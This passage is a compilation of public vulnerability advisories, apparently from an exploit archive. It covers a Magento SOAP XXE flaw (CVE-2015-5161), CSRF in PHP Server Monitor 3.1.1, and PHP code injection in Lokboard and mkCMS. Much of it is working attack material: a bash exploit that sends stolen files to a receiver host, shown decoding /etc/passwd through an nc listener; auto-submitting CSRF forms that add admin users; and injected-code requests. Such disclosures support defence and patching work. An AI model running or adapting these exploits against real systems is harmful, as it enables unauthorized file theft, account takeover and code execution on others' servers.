- eBay Magento eCommerce

http://magento.com/

"More than 240,000 merchants worldwide put their trust in our eCommerce 
software. Magento's eCommerce platform gives you the tools you need to attract 
more prospects, sell more products, and make more money. It's what we do.

We're owned by eBay, so you know we're eCommerce experts"


- PHP FPM

http://php.net/manual/en/install.fpm.php

"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with
 some additional features (mostly) useful for heavy-loaded sites."

Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI 
process manager into its codebase. 

 
III. INTRODUCTION
-------------------------

eBay Magento eCommerce application uses Zend Framework which has a 
vulnerability that allows for XML eXternal Entity injection in applications
served with PHP FPM.

XXE (XML eXternal Entity) attack is an attack on an application that parses XML 
input from untrusted sources using incorrectly configured XML parser. 
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues on PHP applications may also lead to denial of service or
in some cases (e.g. when an 'expect' PHP module is installed) lead to command 
execution.


IV. DESCRIPTION
-------------------------
 
The aforementioned XXE vulnerability in Zend Framework which affects eBay 
Magento, was assigned a CVE-ID of CVE-2015-5161 and can be found in a 
separate advisory at:

http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt

In short, the Zend Framework XXE vulnerability stems from an insufficient 
sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP 
applications. 
By using certain multibyte encodings within XML, it is possible to bypass 
the sanitisation and perform certain XXE attacks.

Since eBay Magento is based on Zend Framework and uses several of its XML
classes, it also inherits this XXE vulnerability.

The vulnerability in Zend affects all its XML components, however there 
are two vulnerable Zend Framework vulnerable components:

 - Zend_XmlRpc_Server 
 - Zend_SOAP_Server 

that are of special interest to attackers as they could be exploited remotely 
without any authentication. 

Magento implements a store API providing XML/SOAP web services. 
Although the Zend_XmlRpc is present within Magento code base, the testing 
revealed that an older Zend class was used for its implementation, which is
not vulnerable.

However, further testing revealed that Magento SOAP API was implemented using
the Zend_SOAP_Server class from Zend Framework, which is vulnerable to the 
XXE injection vulnerability discovered earlier.

 
V. PROOF OF CONCEPT
-------------------------
 
Normally, when an XML containing entities is supplied to magento SOAP API, the
following message gets produced:

<SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Sender</faultcode>
<faultstring>Detected use of ENTITY in XML, disabled to prevent XXE/XEE 
attacks</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope> 

Below is a POC exploit that automates the steps necessary to bypass this
protection on Magento served with PHP-FPM, and remotely exploit the XXE issue 
in Magento's SOAP API without authentication.
Authentication is not required for the exploitation, as Magento first needs to
load the malicious XML data in order to read credentials within the SOAP 
login method. Loading malicious XML may be enough to trigger attacker's payload
within the entities (in case of libxml2 library auto-expanding entities).


---[ magento-soap-exploit.sh ]---

#!/bin/bash
#
# POC Exploit (v1.1)
#
# eBay Magento CE  <= 1.9.2.1  XML eXternal Entity Injection (XXE) on PHP-FPM
# eBay Magento EE  <= 1.14.2.1
#
# CVE-2015-5161
#
# Credits:
#
# Dawid Golunski
# dawid (at) legalhackers.com
# http://legalhackers.com
#
# Advisories:
#
# http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt
# http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
#
# Usage:
#
# [Vulnerability test]
#
# This is to test the vulnerability with a simple XXE payload which retrieves the
# /dev/random file and causes a time out. No receiver server is required in this
# test as no data is returned.
#
# Run the script with just the URL to Magento SOAP API, with no other parameters. 
# E.g:
# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index
#
#
# [File retrieval from the remote server]
# 
# ./magento-soap-exploit.sh MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT
#
# E.g:
# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 192.168.10.5 80
#
# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to:
# http://192.168.10.5:80/fetch.php?D=[base64_string]
# You should have the receiver server/script listening on the specified port before running this exploit.
#

TIMEOUT=6
PAYLOAD_TMP_FILE="/tmp/payload-utf16.xml"

if [ $# -ne 1 ] && [ $# -ne 4 ] ; then 
	echo -e "\nUsage: \n"
	echo -e "[Vulnerability test]\n"
	echo -e "$0 MAGENTO_SOAP_API_URL"
	echo -e "E.g:"
	echo -e "$0 http://fpmserver/magento/index.php/api/soap/index\n";
	echo -e "[File retrieval]\n"
	echo -e "$0 MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT"
	echo -e "E.g:"
	echo -e "$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 192.168.5.6 80\n";
	exit 2;
else 
	TARGETURL="$1"
fi
if [ $# -eq 4 ]; then 
	FILE="$2"	
	RECEIVER_HOST="$3"
	RECEIVER_PORT="$4"
	TEST_ONLY=0
else
	TEST_ONLY=1
fi 

if [ $TEST_ONLY -eq 1 ]; then 
	# Vulnerability test 
	# Perform only a test by reading /dev/random file
	TEST_PAYLOAD_XML='<?xml version="1.0" encoding="UTF-16"?>
	<!DOCTYPE foo [  
	<!ELEMENT PoC ANY >
	<!ENTITY % xxe SYSTEM "file:///dev/random" >
		%xxe;
	]>'

	echo "$TEST_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
	echo -e "Target URL: $TARGETURL\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n"

	# Fetching /dev/random should cause the remote script to block
	# on reading /dev/random until the script times out.
	# If there is no delay it means the remote script is not vulnerable or 
	# /dev/random is not accessible.
	START=$(date +%s)
	wget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
	END=$(date +%s)
	DIFF=$(expr $END \- $START )

	if [ $DIFF -eq $TIMEOUT ]; then
		echo "Vulnerable. No response from Magento for $DIFF seconds :)"
		exit 0
	else 
		echo "Not vulnerable, or there is no /dev/random on the remote server ;)"
		exit 1
	fi
else 
	# File retrieval XXE payload
	SEND_DTD="<?xml version=\"1.0\" encoding=\"UTF-8\"?>
	<!ENTITY % all \"<!ENTITY &#37; send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\">
	%all;"
	SEND_DTD_B64="`echo "$SEND_DTD" | base64 -w0`"
	FILE_PAYLOAD_XML="<?xml version=\"1.0\" encoding=\"UTF-16\"?>
	<!DOCTYPE foo [  
	<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=$FILE\">
	<!ENTITY % dtd SYSTEM \"data://text/plain;base64,$SEND_DTD_B64\">
	%dtd;

	%send;
	]>"

	# Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT
	echo "$FILE_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
	echo -e "Target URL: $TARGETURL\n\nInjecting XXE payload to retrieve the $FILE file..."
	echo -e "If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]\n"
	echo -e "If in doubt, try the vulnerability test option.\n"
	wget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
fi


--------------------------------

The above exploit uses the Out of band XXE payload which sends
any retrieved data back to the attacker even though the attacker cannot
see the resulting file in the server's response directly. 
This exploit also bypasses the LIBXML_NONET libxml setting imposed by the Zend 
Framework which prohibits network access. This is achieved through the usage of
php://filter wrapper which is treated as a local resource by the XML ENTITY 
handler even though it references remote resources. 

Successful exploitation in a test mode ('Vulnerability test', exploit run 
without parameters other than the URL to Magento SOAP API) will result in a 
time out and an internal server error caused by the XML ENTITY accessing 
/dev/random file which will block the API script. 

For example:

---

$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index
Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting Test XXE payload (/dev/random). Might take a few seconds.

--2015-05-19 22:14:17--  http://vulnhost/magento/index.php/api/soap/index
Resolving precise (vulnhost)... 127.0.0.1
Connecting to vulnhost (vulnhost)|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in 
headers. Giving up.

Vulnerable. No response from Magento for 6 seconds :)

---


Arbitrary file accessible to the PHP process can also be fetched with the 
above exploit by using the following syntax:

---

attacker$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index /etc/passwd attackershost 9090

Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting XXE payload to retrieve the /etc/passwd file... 

If successful, Base64 encoded result will be sent to http://attackershost:9090/fetch.php/D=[base64_result]
If in doubt, try the vulnerability test option.

--2015-05-19 22:33:06--  http://vulnhost/magento/index.php/api/soap/index
Resolving vulnhost (vulnhost)... 192.168.57.12
Connecting to vulnhost (vulnhost)|192.168.57.12|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in 
headers. Giving up.

---

The result will be sent to attacker's server listening on port 9090 which
needs to be set up before running the exploit:

---

attacker# nc -vv -l 9090

Listening on [0.0.0.0] (family 0, port 9090)
Connection from [192.168.57.12] port 9090 [tcp/*] accepted (family 2, sport 47227)
GET /fetch.php?D=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY[...cut...] HTTP/1.0
Host: attackershost:9090


attacker# echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY' | base64 -d

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]

---


It may also be possible to execute arbitrary commands on the remote server
if the remote PHP installation has the 'expect' module enabled.
In such case, an attacker could use expect:// wrapper within XML ENTITY
to execute any command in the context of the PHP process.
For example, by adding the XML entity of:

<ENTITY % file SYSTEM "expect://id">

the attacker could execute the /usr/bin/id command on the remote Magento host.


VI. BUSINESS IMPACT
-------------------------

This issue should be marked as high/critical due to the wide deployment of 
eBay Magento software, low complexity of exploitation, as well as a possibility
of an unauthenticated remote exploitation as demonstrated in this advisory. 
If successful, an attacker could access sensitive files available to the
web server process, cause Denial Of Service, or even execute arbitrary commands
on the server with the permissions of the PHP/web process if certain PHP 
modules are installed.

There is also a growing number of servers set up to serve PHP code with 
PHP-FPM, especially in web hosting environments which need to respond to heavy
load.
There are official Magento tutorials explaining how to set up Magento with Nginx
and PHP FPM for best performance:

http://info.magento.com/rs/magentocommerce/images/
MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf
 
VII. SYSTEMS AFFECTED
-------------------------

Versions of eBay Magento CE equal to 1.9.2.1, or older can be exploited on a
web server with PHP-FPM SAPI.
eBay Magento EE was not tested, but is also affected by this issue according
to the vendor (see APPSEC-1045), up to version EE 1.14.2.1.

To be exploitable, the system must have a version of libxml library which 
expands XML entities without additional libxml2 settings. This is true for 
older versions, as well as newer versions of libxml2 with missing updates,
such as a fairly recent patch for the issue of CVE-2014-0191. 
For some distributions (see references below) libxml2 patches were released 
as late as April 2015, and for this reason, there are likely many systems 
which still lack the libml2 updates and allow to exploit the Magento/Zend 
vulnerability described in this advisory.

The exploit however does not depend on a PHP version installed. In fact, the
exploit was confirmed to work on Fedora 21 with a new (a month's old) PHP 
version of:

PHP Version => 5.6.14
Build Date => Sep 30 2015 13:53:16

The issue can also be exploited on multiple web servers, as PHP-FPM can be set
up on popular web servers such as Apache, or Nginx on Linux/Unix, as well as 
Windows systems (as per the 'fpm on cygwin' setup guides available on the 
Internet).

 
VIII. SOLUTION
-------------------------

eBay Magento was informed about the issue and assigned it a reference ID of
APPSEC-1045. eBay released a patch bundle titled:

'SUPEE-6788 Patch Bundle'

prior to the release of this advisory. 
To address the vulnerability, the patch should be installed, or Magento should 
be upgraded to the latest version of 1.9.2.2 which already contains the fix.
 
IX. REFERENCES
-------------------------

http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt

http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt

http://framework.zend.com/security/advisory/ZF2015-06

Powering Magento with Ngnix and PHP-FPM:
http://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf

http://www.securiteam.com/

http://seclists.org/fulldisclosure/2015/Oct/105

Official eBay Magento website:
http://magento.com/

Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML 
Functionality Using Multibyte Payloads' (APPSEC-1045) is available at:

http://merch.docs.magento.com/ce/user_guide/magento/patch-releases-2015.html

CVE-2014-0191 :
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191
https://bugzilla.redhat.com/show_bug.cgi?id=1090976


X. DISCOVERED BY
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
 
XI. REVISION HISTORY
-------------------------

Oct 29th, 2015:  Advisory released

Nov 3rd,  2015:  Updated exploit to work on newer libxml2 versions such as 
                 2.9.1 without CVE-2014-0191 patch, updated 'Systems affected' 
                 section, plus minor updates in other sections
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt


Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:
================================
PHP Server Monitor 3.1.1


Vulnerability Type:
=================================
Cross site request forgery (CSRF)


Vulnerability Details:
=====================

Multiple CSRF issues in PHP Server Monitor allow remote attackers to add
arbitrary users & servers to the system, modify system configurations
and delete arbitrary servers, if user (admin) is logged in and visits our
malicious website or clicks on our infected linxs. As no CRSF protection is
used in the application, we can make request on the victims behalf an the
server will happily oblige processing our malicous HTTP requests.


Exploit code(s):
===============

<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>


1) add arbitrary users to the system:

<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=0"
method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="20">
<input type="text" name="password" value="abc123">
<input type="text" name="password_repeat" value="abc123">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>



2) add arbitrary servers to the system:

<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=server&action=save&id=0&back_to="
method="post">
<input type="text" name="label" value="HELL" >
<input type="text" name="ip" value="malicious-domain.hell">
<input type="text" name="type" value="service">
<input type="text" name="port" value="666">
<input type="text" name="pattern" value="">
<input type="text" name="warning_threshold" value="1">
<input type="text" name="timeout" value="">
<input type="text" name="active" value="yes">
<input type="text" name="email" value="yes">
<input type="text" name="sms" value="yes">
<input type="text" name="pushover" value="yes">
</form>


3) modify system configuration:

<form id="HELL" action="
http://localhost/phpservermon-3.1.1/index.php?mod=config&action=save"
method="post">
<input type="text" name="language" value="en_US" >
<input type="text" name="show_update%5B%5D=" value="on">
<input type="text" name="auto_refresh_servers" value="0">
<input type="text" name="alert_type" value="status">
<input type="text" name="log_status%5B%5D" value="on">
<input type="text" name="log_retention_period" value="1">
<input type="text" name="email_status%5B%5D" value="on">
<input type="text" name="log_email%5B%5D" value="on">
<input type="text" name="email_from_name" value="ghostofsin">
<input type="text" name="email_from_email" value="abysmalgodz@abyss.com">
<input type="text" name="email_smtp_port" value="25">
<input type="text" name="email_smtp_security" value="">
<input type="text" name="email_smtp_username" value="">
<input type="text" name="email_smtp_password" value="">
<input type="text" name="test_email" value="1">
<input type="text" name="log_sms%5B%5D" value="on">
<input type="text" name="sms_gateway" value="whatever">
<input type="text" name="sms_gateway_username" value="username">
<input type="text" name="sms_gateway_password" value="password">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="test_sms" value="0">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="log_pushover%5B%5D" value="0">
<input type="text" name="pushover_api_token" value="">
<input type="text" name="test_pushover" value="0">
</form>

</body>
</html>


4) arbitrary server deletion via GET request:

http://localhost/sectest/phpservermon-3.1.1/?&mod=server&action=delete&id=2


Exploitation Technique:
=======================
Remote


Severity Level:
=========================================================
High


Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure


Description:
==========================================================


Request Method(s):              [+]  GET / POST


Vulnerable Product:             [+]  PHP Server Monitor 3.1.1



===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/60459/info

Lokboard is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Lokboard 1.1 is vulnerable; other versions may also be affected. 

POST /lokboard/install/index_4.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lokboard/install/index_3.php?error=1
Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();//
HireHackking 
source: https://www.securityfocus.com/bid/60488/info

mkCMS is prone to an arbitrary PHP code-execution vulnerability.

An attacker can exploit this issue to execute arbitrary PHP code within the context of the affected application.

mkCMS 3.6 is vulnerable; other versions may also be affected. 

http://www.example.com/mkCMS/index.php?cmd=dir